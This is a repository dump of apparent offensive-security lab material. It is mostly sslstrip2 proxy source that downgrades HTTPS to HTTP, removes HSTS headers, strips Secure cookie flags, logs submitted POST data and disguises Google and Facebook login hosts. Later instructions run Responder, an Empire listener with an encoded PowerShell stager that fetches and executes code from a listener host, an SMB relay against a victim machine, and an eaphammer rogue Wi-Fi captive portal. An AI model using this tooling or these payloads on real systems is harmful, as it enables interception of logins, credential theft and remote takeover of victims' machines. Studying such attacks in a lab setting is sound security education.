GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. 
So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return 
expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 
6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 
29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | newvalues =[] 49 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 50 | values = value.split(';') 51 | for v in values: 52 | if v[:7].lower()==' domain': 53 | dominio=v.split("=")[1] 54 | logging.debug("LEO Parsing cookie domain parameter: %s"%v) 55 | real = self.urlMonitor.sustitucion 56 | if dominio in real: 57 | v=" Domain=%s"%real[dominio] 58 | logging.debug("LEO New cookie domain parameter: %s"%v) 59 | newvalues.append(v) 60 | value = ';'.join(newvalues) 61 | 62 | if (key.lower() == 'access-control-allow-origin'): 63 | value='*' 64 | 65 | ServerConnection.handleHeader(self, key, value) 66 | 67 | def stripFileFromPath(self, path): 68 | (strippedPath, lastSlash, file) = path.rpartition('/') 69 | return strippedPath 70 | 71 | def buildAbsoluteLink(self, link): 72 | absoluteLink = "" 73 | 74 | if ((not link.startswith('http')) and (not link.startswith('/'))): 75 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 76 | 77 | logging.debug("Found path-relative link in secure transmission: " + link) 78 | logging.debug("New Absolute path-relative link: " + absoluteLink) 79 | elif not link.startswith('http'): 80 | absoluteLink 
= "http://"+self.headers['host']+link 81 | 82 | logging.debug("Found relative link in secure transmission: " + link) 83 | logging.debug("New Absolute link: " + absoluteLink) 84 | 85 | if not absoluteLink == "": 86 | absoluteLink = absoluteLink.replace('&', '&') 87 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 88 | 89 | def replaceCssLinks(self, data): 90 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 91 | 92 | for match in iterator: 93 | self.buildAbsoluteLink(match.group(1)) 94 | 95 | return data 96 | 97 | def replaceFavicon(self, data): 98 | match = re.search(SSLServerConnection.iconExpression, data) 99 | 100 | if (match != None): 101 | data = re.sub(SSLServerConnection.iconExpression, 102 | "", data) 103 | else: 104 | data = re.sub(SSLServerConnection.headExpression, 105 | "", data) 106 | 107 | return data 108 | 109 | def replaceSecureLinks(self, data): 110 | data = ServerConnection.replaceSecureLinks(self, data) 111 | data = self.replaceCssLinks(data) 112 | 113 | if (self.urlMonitor.isFaviconSpoofing()): 114 | data = self.replaceFavicon(data) 115 | 116 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 117 | 118 | for match in iterator: 119 | self.buildAbsoluteLink(match.group(10)) 120 | 121 | return data 122 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging, re, string, random, zlib, gzip, StringIO

from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor

class ServerConnection(HTTPClient):

    ''' The server connection is where we do the bulk of the stripping.
    Everything that comes back is examined. The headers we dont like are
    removed, and the links are stripped from HTTPS to HTTP.
    '''

    # Any https:// URL appearing in a response body or Location header.
    urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
    urlType = re.compile(r"https://", re.IGNORECASE)
    urlTypewww = re.compile(r"https://www", re.IGNORECASE)
    urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
    urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
    urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
    # NOTE(review): '\?{0}' matches zero occurrences of '?' (the empty string
    # right after the captured URL) -- kept as-is from upstream.
    urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client
        self.urlMonitor = URLMonitor.getInstance()
        self.isImageRequest = False
        self.isCompressed = False
        self.contentLength = None
        self.shutdownComplete = False

    def getLogLevel(self):
        # Plain-HTTP traffic is noisy; subclasses raise this (see
        # SSLServerConnection, which logs at INFO).
        return logging.DEBUG

    def getPostPrefix(self):
        return "POST"

    def sendRequest(self):
        logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri))
        self.sendCommand(self.command, self.uri)

    def sendHeaders(self):
        # Forward the client's headers to the real server unchanged.
        for header, value in self.headers.items():
            logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
            self.sendHeader(header, value)

        self.endHeaders()

    def sendPostData(self):
        # POST bodies are where credentials live -- log them at WARNING.
        logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))
        self.transport.write(self.postData)

    def connectionMade(self):
        logging.log(self.getLogLevel(), "HTTP connection made.")
        self.sendRequest()
        self.sendHeaders()

        if (self.command == 'POST'):
            self.sendPostData()

    def handleStatus(self, version, code, message):
        logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
        self.client.setResponseCode(int(code), message)

    def handleHeader(self, key, value):
        '''Filter/rewrite a single response header before passing it on.

        Location headers are stripped of https://, image responses are
        flagged for pass-through, gzip responses are flagged for
        decompression, Set-Cookie goes through addRawHeader (multiple
        cookies must not be collapsed), and Strict-Transport-Security is
        silently dropped.
        '''
        logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value))

        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
                self.isImageRequest = True
                logging.debug("Response is image content, not scanning...")

        if (key.lower() == 'content-encoding'):
            if (value.find('gzip') != -1):
                logging.debug("Response is compressed...")
                self.isCompressed = True
        elif (key.lower() == 'content-length'):
            # Remember it; we re-emit a corrected length after rewriting.
            self.contentLength = value
        elif (key.lower() == 'set-cookie'):
            self.client.responseHeaders.addRawHeader(key, value)
        elif (key.lower() == 'strict-transport-security'):
            # Dropping HSTS is the whole point: never forward it.
            logging.log(self.getLogLevel(), "LEO Erasing Strict Transport Security....")
        else:
            self.client.setHeader(key, value)

    def handleEndHeaders(self):
        if (self.isImageRequest and self.contentLength != None):
            # Images are streamed through untouched, so the original
            # Content-Length is still valid.
            self.client.setHeader("Content-Length", self.contentLength)

        # self.length is maintained by twisted's HTTPClient.
        if self.length == 0:
            self.shutdown()

    def handleResponsePart(self, data):
        if (self.isImageRequest):
            # Stream image bytes straight through without buffering.
            self.client.write(data)
        else:
            HTTPClient.handleResponsePart(self, data)

    def handleResponseEnd(self):
        if (self.isImageRequest):
            self.shutdown()
        else:
            HTTPClient.handleResponseEnd(self)

    def handleResponse(self, data):
        if (self.isCompressed):
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        logging.log(self.getLogLevel(), "Read from server:\n" + data)

        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            # BUG FIX: header values must be strings; passing the bare int
            # from len(data) breaks header serialization.
            self.client.setHeader('Content-Length', str(len(data)))

        self.client.write(data)
        self.shutdown()

    def replaceSecureLinks(self, data):
        '''Rewrite every https:// reference in data to a tokenized http://
        equivalent, registering each rewritten URL with the URL monitor so
        the corresponding request is later proxied over SSL.
        '''
        sustitucion = {}
        patchDict = self.urlMonitor.patchDict

        # First apply the static patch dictionary in a single pass.
        if len(patchDict) > 0:
            dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
            data = dregex.sub(lambda x: str(patchDict[x.string[x.start():x.end()]]), data)

        # Collect every https:// reference and its tokenized replacement.
        iterator = re.finditer(ServerConnection.urlExpression, data)
        for match in iterator:
            url = match.group()

            logging.debug("Found secure reference: " + url)
            nuevaurl = self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
            logging.debug("LEO replacing %s => %s" % (url, nuevaurl))
            sustitucion[url] = nuevaurl

        # Substitute all collected URLs in one pass.
        if len(sustitucion) > 0:
            dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
            data = dregex.sub(lambda x: str(sustitucion[x.string[x.start():x.end()]]), data)

        return data

    def shutdown(self):
        # Idempotent teardown of both sides of the proxied connection.
        if not self.shutdownComplete:
            self.shutdownComplete = True
            self.client.finish()
            self.transport.loseConnection()

# ------------------------------------------------------------------------------
# lab4/sslstrip2/sslstrip/ServerConnectionFactory.py:
# ------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
from twisted.internet.protocol import ClientFactory

class ServerConnectionFactory(ClientFactory):
    '''Builds server-side protocol instances for outbound requests, retrying
    over SSL (port 443) when the plaintext connection attempt fails.'''

    def __init__(self, command, uri, postData, headers, client):
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client

    def buildProtocol(self, addr):
        # self.protocol is assigned by the caller before connecting.
        return self.protocol(self.command, self.uri, self.postData,
                             self.headers, self.client)

    def clientConnectionFailed(self, connector, reason):
        logging.debug("Server connection failed.")

        destination = connector.getDestination()

        if destination.port == 443:
            # SSL already failed too: give up and close the client side.
            self.client.finish()
        else:
            logging.debug("Retrying via SSL")
            self.client.proxyViaSSL(self.headers['host'], self.command,
                                    self.uri, self.postData, self.headers, 443)

# ------------------------------------------------------------------------------
# lab4/sslstrip2/sslstrip/StrippingProxy.py:
# ------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest

class StrippingProxy(HTTPChannel):
    '''The transparent proxy channel at the heart of sslstrip.

    This is the basic proxy server class: it receives callbacks for GET and
    POST methods, then proxies them out over HTTP or HTTPS depending on what
    is known about the (connection, client_address) tuple in the cache.
    '''

    # Every incoming request on this channel is handled by ClientRequest.
    requestFactory = ClientRequest

# ------------------------------------------------------------------------------
# lab4/sslstrip2/sslstrip/URLMonitor.py:
# ------------------------------------------------------------------------------
# URLMonitor

import re
import logging

class URLMonitor:

    '''
    The URL monitor maintains a set of (client, url) tuples that correspond to
    requests which the server is expecting over SSL. It also keeps track of
    secure favicon urls.
    '''

    # Start the arms race, and end up here...
class URLMonitor:

    '''
    The URL monitor maintains a set of (client, url) tuples that correspond to
    requests which the server is expecting over SSL. It also keeps track of
    the tokenized hostnames used to sidestep HSTS, and of secure favicon urls.
    '''

    # Start the arms race, and end up here...
    javascriptTrickery = [re.compile(r"http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
    _instance = None

    # LEO: hostname -> tokenized hostname, and the reverse mapping.
    # NOTE(review): these are class-level dicts, shared by every instance.
    sustitucion = {}
    real = {}
    # Literal (javascript-escaped) substrings patched directly into bodies.
    patchDict = {
        'https:\/\/fbstatic-a.akamaihd.net': 'http:\/\/webfbstatic-a.akamaihd.net',
        'https:\/\/www.facebook.com': 'http:\/\/wwww.facebook.com',
        'return"https:"': 'return"http:"'
    }

    def __init__(self):
        self.strippedURLs = set()
        self.strippedURLPorts = {}
        self.faviconReplacement = False
        # BUG FIX: isFaviconSpoofing()/isSecureFavicon() read this attribute,
        # but it was only ever created by setFaviconSpoofing(); initialize it
        # so those methods cannot raise AttributeError.
        self.faviconSpoofing = False

        self.sustitucion["mail.google.com"] = "gmail.google.com"
        self.real["gmail.google.com"] = "mail.google.com"

        self.sustitucion["www.facebook.com"] = "social.facebook.com"
        self.real["social.facebook.com"] = "www.facebook.com"

        self.sustitucion["accounts.google.com"] = "cuentas.google.com"
        self.real["cuentas.google.com"] = "accounts.google.com"

        self.sustitucion["accounts.google.es"] = "cuentas.google.es"
        self.real["cuentas.google.es"] = "accounts.google.es"

    def isSecureLink(self, client, url):
        '''True when url matches a known javascript trick or was previously
        registered (for this client) as a stripped secure link.'''
        for expression in URLMonitor.javascriptTrickery:
            if (re.match(expression, url)):
                logging.debug("JavaScript trickery!")
                return True

        if (client, url) in self.strippedURLs:
            logging.debug("(%s, %s) in strippedURLs" % (client, url))
        # Explicit bool (the original fell off the end and returned None).
        return (client, url) in self.strippedURLs

    def getSecurePort(self, client, url):
        # Port the upstream SSL connection should use; defaults to 443.
        if (client, url) in self.strippedURLs:
            return self.strippedURLPorts[(client, url)]
        else:
            return 443

    def addSecureLink(self, client, url):
        '''Register an https URL as stripped for this client and return the
        tokenized http:// URL that should be served to the browser.'''
        methodIndex = url.find("//") + 2
        method = url[0:methodIndex]
        pathIndex = url.find("/", methodIndex)

        # BUG FIX: was 'pathIndex is -1' -- identity comparison against an
        # int literal is implementation-defined; use equality.
        if pathIndex == -1:
            pathIndex = len(url)
            url += "/"

        host = url[methodIndex:pathIndex].lower()
        path = url[pathIndex:]

        port = 443
        portIndex = host.find(":")

        if (portIndex != -1):
            # BUG FIX: the port must be sliced out *before* host is
            # truncated; the original truncated first, so the slice was
            # always empty and every explicit port collapsed to 443.
            port = host[portIndex + 1:]
            host = host[0:portIndex]
            if len(port) == 0:
                port = 443

        # LEO: tokenize the hostname so the browser never contacts the real
        # (possibly HSTS-protected) domain: www.x -> wwww.x, otherwise webx.
        if host not in self.sustitucion:
            lhost = host[:4]
            if lhost == "www.":
                self.sustitucion[host] = "w" + host
                self.real["w" + host] = host
            else:
                self.sustitucion[host] = "web" + host
                self.real["web" + host] = host
            logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host, self.sustitucion[host]))

        url = 'http://' + host + path

        self.strippedURLs.add((client, url))
        self.strippedURLPorts[(client, url)] = int(port)
        return 'http://' + self.sustitucion[host] + path

    def setFaviconSpoofing(self, faviconSpoofing):
        self.faviconSpoofing = faviconSpoofing

    def isFaviconSpoofing(self):
        return self.faviconSpoofing

    def isSecureFavicon(self, client, url):
        return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

    def URLgetRealHost(self, host):
        # Map a tokenized hostname back to the real one (identity otherwise).
        logging.debug("Parsing host: %s" % host)
        if host in self.real:
            logging.debug("New host: %s" % self.real[host])
            return self.real[host]
        else:
            logging.debug("New host: %s" % host)
            return host

    def getInstance():
        # Lazily-created process-wide singleton.
        if URLMonitor._instance == None:
            URLMonitor._instance = URLMonitor()

        return URLMonitor._instance

    getInstance = staticmethod(getInstance)

# ------------------------------------------------------------------------------
# lab4/sslstrip2/sslstrip/__init__.py:
# (empty package marker; content omitted from this dump)
# ------------------------------------------------------------------------------
# lab5/instructions.txt:
--------------------------------------------------------------------------------
1. Start responder:

       responder -I eth0 -wr

2. Attempt to access nonexistent SMB share in Windows AD Victim 1 machine
--------------------------------------------------------------------------------
/lab6/instructions.txt:
--------------------------------------------------------------------------------
In your Kali VM:

1. Start Empire

       ./empire

2. In Empire, enter "listeners" submenu

       (Empire) > listeners

3. In "listeners" submenu, enter the following command:

       (Empire: listeners) > uselistener http

4. Enter "info" to see a list of options

       (Empire: listeners/http) > info

5. Set name to awae1

       (Empire: listeners/http) > set Name awae1

6. In another terminal, use ifconfig eth0 to obtain your IP address

       (Empire: listeners/http) > ifconfig eth0

7. Set "Host" to http://<your IP address>:4444

       (Empire: listeners/http) > set Host http://10.10.10.102:4444

8. Start the listener

       (Empire: listeners/http) > execute

9. Enter "back" to return to the "listeners" submenu

       (Empire: listeners/http) > back

9. Enter "back" to return to the main menu

       (Empire: listeners) > back

10. Select a launcher stager

       (Empire) > usestager multi/launcher

11. Use the "info" command to see a list of options

       (Empire: stager/multi/launcher) > info

12. Select the listener we created earlier

       (Empire: stager/multi/launcher) > use Listener awae1

13. Display the listener on the screen

       (Empire: stager/multi/launcher) > execute


14.
Set output to environment variable: 61 | 62 | 63 | cmd='powershell -noP -sta -w 1 -enc WwBSAEUARgBdAC4AQQBzAFMARQBNAGIAbABZAC4ARwBlAHQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAEkAZQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBsAFUARQAoACQATgB1AGwAbAAsACQAdAByAHUARQApAH0AOwBbAFMAWQBTAHQARQBtAC4ATgBFAFQALgBTAGUAUgBWAGkAQwBlAFAAbwBJAG4AdABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAQwB0ADEAMAAwAEMATwBOAFQASQBOAFUARQA9ADAAOwAkAFcAQwA9AE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAUwBUAEUAbQAuAE4ARQB0AC4AVwBFAGIAQwBsAEkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAGUAYQBEAEUAUgBzAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAEMALgBQAFIAbwBYAHkAPQBbAFMAeQBTAFQARQBtAC4ATgBlAHQALgBXAEUAYgBSAGUAUQBVAGUAUwB0AF0AOgA6AEQAZQBGAEEAdQBsAFQAVwBFAGIAUABSAE8AWAB5ADsAJABXAEMALgBQAHIAbwBYAFkALgBDAHIAZQBkAEUAbgBUAGkAYQBsAHMAIAA9ACAAWwBTAHkAcwBUAGUATQAuAE4AZQB0AC4AQwByAGUARABlAG4AVABpAEEATABDAEEAYwBoAGUAXQA6ADoARABlAEYAYQB1AGwAdABOAGUAVAB3AE8AUgBLAEMAUgBlAGQAZQBuAHQAaQBhAGwAUwA7ACQASwA9AFsAUwB5AHMAVABlAG0ALgBUAEUAeABUAC4ARQBuAGMATwBEAGkAbgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQBUAEUAcwAoACcARgBzAEsAPwBDAEoAOABQAF0AYQBmAGMALwAyAFcAfABlAFoAJgBVAE4AeQA3AFEARABMAHsAMQBFAHoAWwBHACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAX
wAtAEIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAEEAZABlAHIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AQwB5AEEAeQBZAFcAUwBwAEQAKwB2AC8AWQBaADIAVQBXAEYATwBMAEcAZwBoADEANQBrAFkAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMAAuADEAMAAyADoANAA0ADQANAAnADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABkAEEAVABBAD0AJABXAEMALgBEAE8AVwBOAEwAbwBBAEQARABBAHQAYQAoACQAUwBlAFIAKwAkAFQAKQA7ACQASQB2AD0AJABkAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAG4AZwBUAGgAXQA7AC0ASgBPAGkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=' 64 | 65 | 15. Start SMB Relay server, targeting Windows AD Victim 2. The -h flag is used to specify the 66 | target's IP address. The -c flag is used to specify a command to run on the target machine. 67 | 68 | python smbrelayx.py -h -c $cmd 69 | 70 | 16. Log into Windows AD Victim 1 as EXAMPLE\Administrator 71 | 72 | 17. Attempt to access the SMB Share \\trololololo\lololollololol 73 | 74 | 18. Wait for reverse connection from Kali VM. 75 | -------------------------------------------------------------------------------- /lab7/instructions.txt: -------------------------------------------------------------------------------- 1 | Create a captive portal using eaphammer with the following flags: 2 | 3 | bssid=`ifconfig eth0 | grep ether | awk '{ print $2 }'` 4 | 5 | ./eaphammer -i wlan0 --bssid $bssid --essid FREE_WIFI --captive-portal 6 | --------------------------------------------------------------------------------